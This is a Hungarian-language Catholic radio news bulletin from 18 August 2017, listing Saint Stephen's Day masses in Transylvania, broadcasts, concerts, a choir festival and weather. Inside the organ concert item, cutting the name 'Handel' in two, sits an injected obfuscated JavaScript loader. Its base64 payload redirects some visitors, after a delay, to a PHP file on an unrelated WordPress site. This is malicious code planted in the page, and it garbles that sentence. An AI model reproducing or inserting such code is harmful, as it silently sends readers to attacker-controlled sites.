2017. augusztus 18. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap Gyergyótölgyesen tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, imádjuk Őt és engedjük, hogy jelenléte betöltse szívünket, egész lényünket.

Szent István-napi búcsúk
A gyulafehérvári főegyházmegyében a mezőbándi és a borszéki búcsús szentmise Szent István király tiszteletére augusztus 19-én, holnap délelőtt tizenegy órakor kezdődik.
Perkőn augusztus 20-án, vasárnap tartják a Szent István-napi búcsút. Délelőtt háromnegyed tizenegykor a kézdiszentléleki templommal szemben lévő téren felavatják a Szent László-szobrot. Utána elindul a zarándokok körmenete. Útközben elvégzik a keresztúti ájtatosságot. Az ünnepi szentmise, melynek szónoka Tamás József püspök, 12:20-kor kezdődik. A liturgikus zenei szolgálatot a kézdiszentléleki egyházi énekkar biztosítja, Dávid István kántor vezénylése alatt.
A borzonti Szent István-napi búcsús szentmisét szintén augusztus 20-án, vasárnap déli tizenkét órától tartják.
Hargitafürdőn augusztus 20-án, vasárnap fél egy órakor tartják a pálos atyák a Szent István búcsút. A főcelebráns és szónok Csóka János, pálos tartományfőnök a szentmise keretében megáldja a templomkertben felújított parkot.
Székelyszentkirályon ugyancsak vasárnap fél egy órakor kezdődik a Szent István napi búcsús szentmise. A szentbeszédet Urbán Erik ferences atya, a csíksomlyói kegytemplom igazgatója tartja.
Csíkajnádon szintén vasárnap fél egy órakor várják a híveket Szent István-napi búcsús szentmisére. Az ünnep szónoka Salamon József gyimesbükki plébános lesz.
Hidegségen a Szent István búcsút vasárnap fél egy órakor tartják. A szentmise szónoka Ferencz István nyugalmazott plébános.
Szintén vasárnap fél egy órakor tartják a búcsút Csíkszentkirályon. A szentmisén Kémenes Lóránt türi plébános prédikál.
Kolozsváron, a Donát úti Szent István-templom búcsúünnepe vasárnap délután hat órakor kezdődik. Szentbeszédet mond Szabó Gyula, nyugalmazott plébános.
A medgyesi Szent István-templom búcsúját szintén vasárnap délután hat órakor ünneplik. A szentmisén Biró Nándor-Alfonz, nagyszebeni lelkész prédikál.
A szatmári egyházmegyében Nagybányán ünnepelnek búcsút Szent István ünnepén. Augusztus 19-én, holnap este hét órától ünnepi szentmise lesz a Szent István torony kápolnájában, majd fél kilenctől a Schola Rivulina ifjúsági énekkar szabadtéri előadása hallgatható meg. Augusztus 20-án, vasárnap Szent István-napi búcsú, délután hat órától rózsafüzér lesz, utána este hét órától kezdődik a szabadtéri szentmise, a Szentháromság templom előtti téren. Ünnepi szónok Schupler Tibor batizi plébános.
A nagyváradi egyházmegyében augusztus 20-án, vasárnap déli tizenkét órakor Biharon Ozsváth József székelyhídi plébános, Nagyszalontán Kiss Márton bélfenyéri plébános, Szentjobbon Nagy Tibor szilágycsehi plébános, Királydarócon pedig Tímár Asztrik kaplonyi ferences házfőnök tart ünnepi búcsús szentmisét.

Hétvégi szentmiseközvetítések
Holnap délelőtt fél tizenegytől a CSIT záró szentmiséjét közvetítjük Csíksomlyóról, este hét órától pedig a kovásznai Mária-áhitatba kapcsolodhatnak be hallgatóink. Vasárnap két szép szentmisét is hallhatnak: déli tizenkét órától Biharról közvetítünk búcsús szentmisét, este hét órától pedig Csíksomlyóról gyémántmisét közvetítünk.

Időjárás: Holnap meleg időre számíthatunk. Délutánra megnövekszik a felhőzet, estére pedig egy hidegfront éri el a Kárpát Medencét, ami csapadékot, és lehűlést hoz. Hajnalban 7-19, majd napközben 29-36 fok közötti maximumokat mérhetünk.

MRE – Hírszolgálat, 2017. augusztus 18.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Csicsókeresztúron tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, imádjuk Őt és engedjük, hogy jelenléte betöltse szívünket, egész lényünket.

Könyvbemutató Kolozsváron
A Kolozsvári Magyar Napok keretében ma délután hat órakor a Szent Mihály Nőszövetség dísztermében mutatják be Frigyesy Ágnes Az Úr csodásan működik – Erdélyi nagy tanúságtevők című könyvét. Bevezetőt mond Kovács Sándor főesperes-plébános. A kötet születésének körülményeiről vall a szerző, Frigyesy Ágnes. Közreműküdik Lakatos Fleisz Katalin, a zenei műsort Potyó István karnagy állította össze. Várnak minden érdeklődőt!

Orgonakoncert Csíkszeredában
Ma este 7 óra 40 perctől orgonakoncert lesz a csíkszeredai Millenniumi templomba. Előadó Kristófi János nagyváradi orgonista, a Partiumi Keresztény Egyetem tanára. Részleteket hallhatnak Bach és Hfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andel műveiből. Szeretettel várnak minden zenekedvelőt!

Közösségi ház megáldása Szilágysomlyón
Augusztus 19-én, holnap déli tizenkét órakor Böcskei László nagyváradi megyéspüspök ünnepélyes szertartás keretében áldja meg a szilágysomlyói római katolikus plébánia felújított közösségi házát.

Unless koncert Székelyudvarhelyen
Székelyudvarhelyen a Szent István-napi ünnepség lelkületéhez illő, dicsőítő koncertet tart holnap este hét órától a Debrecenből és Budapestről érkező UNLESS zenekar. A 2013-ban alakult csapat tagjai így vallanak magukról: „Keresztény elektropop, dance-pop, edm zenekar vagyunk. Célunk, hogy a modern zenei lehetőségeket is felhasználva megmozgassuk a fiatalokat, és elmondjuk, lehet boldog, szabad, álmokkal teli életet élni”. Várnak minden érdeklődő fiatalt!

Orgonamuzsika-maraton és toronymuzsika
Szintén a Kolozsvári Magyar Napok keretén belül holnap orgonamuzsika-maraton lesz a kolozsvári Szent Mihály templomban, délután kettő és este hat óra között. Vasárnap este hét órától pedig toronymuzsika szólal meg a Szent Mihály templom tornyában a csíkszentsimoni Ifjúsági Fúvós Zenekar közreműködésével, Sándor Árpád vezényletével. Erre az eseményre is szeretettel várnak minden érdeklődőt! Részletek a mai déli magazinban.

Családi nap és Mária áhitat Kovásznán
A Tündérvár Székely Nagycsaládosok Egyesülete és a kovásznai római katolikus egyházközség Szent István-napi családi napot szerveznek Kovásznán augusztus 19-én, szombaton, a helyi római katolikus templom kertjében. Délelőtt 10-13 óra között kézműves foglalkozások lesznek. Ezt követően egy órától közös imaóra lesz a családokért a templomban, majd ebéd, délután három órától pedig családok, csoportok vetélkedője veszi kezdetét. Várják a családokat és minden érdeklődőt!
Ugyanakkor Kovásznán minden hónap harmadik szombatján Mária áhítatot tartanak szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket holnap este hét órakor a helyi plébániatemplomba. Az imaalkalmat rádiónk élő adásba közvetíti.

Gyémántmise Csíksomlyón
Márk József ferenc atya hálát adva 60 év papi szolgálatáért vasárnap, Szent István király ünnepén, este hét órakor a csíksomlyói kegytemplomban mutatja be gyémántmiséjét. József atya 47 éve szolgál a csíksomlyói kegyhelyen. Imádkozzunk érette kérve Isten áldását további szolgálatára.

VoCE2017 - kórusfesztivál Kolozsváron
A Visszhang kórus augusztus 21. és 28. között nyolc külföldi kórust lát vendégül a VoCE2017 kórusfesztiválon.
A kolozsvári kórusfesztivál a VoCE2014-2018 európai rendezvénysorozat része. A nemzetközi projekt az I. Világháború centenáriumához kapcsolódik, és Franciaországból indult. Mottója egy Leonard Bernstein idézet: „Ez lesz a mi válaszunk az erőszakra: hogy még intenzívebben, még szebben és még elhívatottabban műveljük a zenét, mint bármikor korábban.” A fesztiválon kilenc kórus vesz részt: két francia, két lengyel, egy bosnyák, egy német, egy belga, egy magyar és a házigazda Visszhang kórus. A nagyközönség számára nyitott programok között szerepel augusztus 23.-án tizenegy órától a BBTE főépületében Az I. Világháború Erdélyben címmel, Nagy József előadása, augusztus 24.-én délután kettő és három óra között villámcsődület a tömegközlekedési eszközökön, valamint du. négy órától Örömóda Bábelben, flashmob a Iulius Mall bevásárlóközpontban. Augusztus 25.-én este hét órától a sétatéri Kaszinó előtt szabadtéri kóruskoncert lesz. A záró hangverseny, melyen közel kétszáz kórustag fog együtt énekelni, augusztus 26.-án este hét órától kezdődik Bábel csendje címmel, a Farkas utcai Auditorium Maximum teremben. A házigazda Visszhang kórus nagy szeretettel vár minden érdeklődőt a kórusfesztivál eseményeire! Részletek a mai déli magazinban.

Időjárás: Továbbra is marad a meleg nyári idő, csapadékra sehol sem kell számítani. A hajnali hőmérsékletek 14-19, a délutáni maximumok pedig 23-34 fok között alakulnak. Szombaton este éri el egy hidegfront a Kárpát Medencét, ami sok csapadékot, szeles időt és komoly lehűlést hoz majd.

MRE - Hírszolgálat, 2017. augusztus 18.

About the author

maradmin

Leave a Comment